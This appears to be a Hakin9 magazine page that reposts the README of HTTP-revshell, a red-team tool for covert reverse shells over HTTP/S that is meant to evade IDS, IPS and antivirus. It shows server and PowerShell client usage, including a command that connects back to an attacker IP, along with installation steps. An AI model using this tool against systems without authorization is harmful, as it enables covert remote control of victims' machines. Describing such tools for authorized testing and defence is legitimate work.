HTTP-revshell is a tool focused on red team exercises and pentesters. This tool provides a reverse connection through the HTTP/s protocol. It uses a covert channel to gain control over the victim machine through web requests and thus evade solutions such as IDS, IPS, and AV.
Help server.py (unisession server)
Server usage:
usage: server.py [-h] [--ssl] [--autocomplete] host port
Process some integers.
positional arguments:
host Listen Host
port Listen Port
optional arguments:
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions
Help Invoke-WebRev.ps1 (client)
Client usage:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
Installation
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt
Quick start server-multisession.py (multisession server)
This server allows multiple connection of clients.
There is a menu with three basic commands: sessions, interact and exit
- sessions --> show currently active sessions
- interact --> interacts with a session (Example: interact <session_id>)
- exit --> close the application
IMPORTANT: To change the session press CTRL+d to exit the current session without closing it.
Features
- SSL
- Proxy Aware
- Upload....
Author
- Hakin9 is a monthly magazine dedicated to hacking and cybersecurity. In every edition, we try to focus on different approaches to show various techniques - defensive and offensive. This knowledge will help you understand how most popular attacks are performed and how to protect your data from them. Our tutorials, case studies and online courses will prepare you for the upcoming, potential threats in the cyber security world. We collaborate with many individuals and universities and public institutions, but also with companies such as Xento Systems, CATO Networks, EY, CIPHER Intelligence LAB, redBorder, TSG, and others.
- LiveSeptember 5, 2024"40 Steps" Satellite Security - Registration for LIVE WORKSHOP IS NOW ON!
- LiveAugust 21, 2024"40 Steps" Game Hacking - Registration for LIVE WORKSHOP IS NOW ON!
- BlogDecember 13, 2022What are the Common Security Weaknesses of Cloud Based Networks?
- BlogOctober 12, 2022Vulnerability management with Wazuh open source XDR
Subscribe
0 Comments
Newest